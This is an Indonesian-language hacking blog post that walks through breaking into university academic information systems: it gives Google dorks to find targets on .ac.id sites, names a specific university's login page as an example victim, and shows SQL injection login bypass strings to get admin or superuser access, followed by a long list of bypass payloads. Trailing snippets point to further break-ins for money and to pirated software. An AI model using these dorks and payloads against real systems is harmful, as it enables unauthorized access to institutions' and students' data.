kali ni 'anonymous'akan meng-share exploit dari bang Barrabravaz dari surabayablackhat exploit ini memang baru dishare di forum tapi banyak kurang mengerti bagaimana caranya :
pertama kita masukkan google dork berikut
Code:
inurl:"/index.php?mnux="
inurl:"/index.php?mnux=" site:ac.id
USE YOUR BRAIN
atau klik
disini banyak disitu targetnya kan
kita pilih salah satu aja dan gak semua bisa diexploit lho :
![[Image: QnK9m1V.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vmeyDBPusGPhPum8GCDo9eQCi8ojtWxW2amNlkeoxlUGXCizMTwFK0pMhPfPOEREOpcAhEZ1LlNV3klUquBrfr5Q=s0-d)
kali ini saya akan memberi satu contoh yaitu :
SIA UNIVERSITAS TULUNGAGUNGnah digambar tadi ada kan SIA UNIVERSITAS TULUNGAGUNG kita klik saja pasti masuk halaman login seperti ini :
![[Image: MLlh8rm.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_tUe9exYdAMXJWc6FNQYkq6bA3o2--yZXhegixUXhb1X4dI1XELHGZBcGttHi18ePq8LDRQBNxcgrTRDV51NW0GRw=s0-d)
kita akan exploit dengan Remote Sql Injection gimana caranya yaitu dengan user dan passwrod bypass admin login
user : ' OR 0=0#
pass : ' OR 0=0#
![[Image: YqFFKdM.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vPNUt3VQY5VDgsnIXyIEx6ayZKZbiw8RBekL8HTYb5qyJGZUSq36GegLfLxWylkw_jezLY-wpUO1k8c9uMb13fTg=s0-d)
kita cobak login bisa kan login dengan user dan password itu
:wus::wus:
![[Image: gbs4.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vJ6c_GMqlgMUavJesVRMrcZ0NQk3N5Xf1MJYnyzThEtbbXchrdNYUWC1B7EHnOHU742MqOQZ4TPMqxXU5EEfc1YmMXPUnV8wmg8kXT1SHaEZM=s0-d)
tara kita masuk dech, tapi gak pasti kita masuk kadang jadi superuser, admin, dan mahasiswa , hhehehehe
nih berikut user password list SQL injection Baypass
Code:
admin'--
= 'or' 1=1
' or 1=1--
'" or 1=1--
' union select 1, 'Eyeless', 'ez2do', 1--
admin'--
administrator'--
superuser'--
test'--
' or 0=0 --
' or 0=0 --'
' or 0=0 #
" or 0=0 --
" or 0=0 --'
'" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
" or 1=1--
or 1=1--
' or a=a--'
' or a=a #
' or a=a--
' or "a"="a
' or 'a'='a
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a
' or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a
pokoknya kita cobak satu persatu aja siapa tahu nyantol
Berbagi itu indah... kali ni lebih indah dapet $$ lagnsung ajjha yang mau bobol... ketauan bukan salah ane ye... Quote: inurl:".php?cat...
Macromedia Dreamweaver 8 Full Version Free Download Free Download Macromedia Dreamweaver 8 Full Version Macromedia Dreamweaver 8 is that t...
Fungsi tool ini pastinya ente sudah tau kan ? yaitu untuk mencari bug pada Com_JCE dalam satu server ! Bahan : Python Script Scanner JCE NB ...
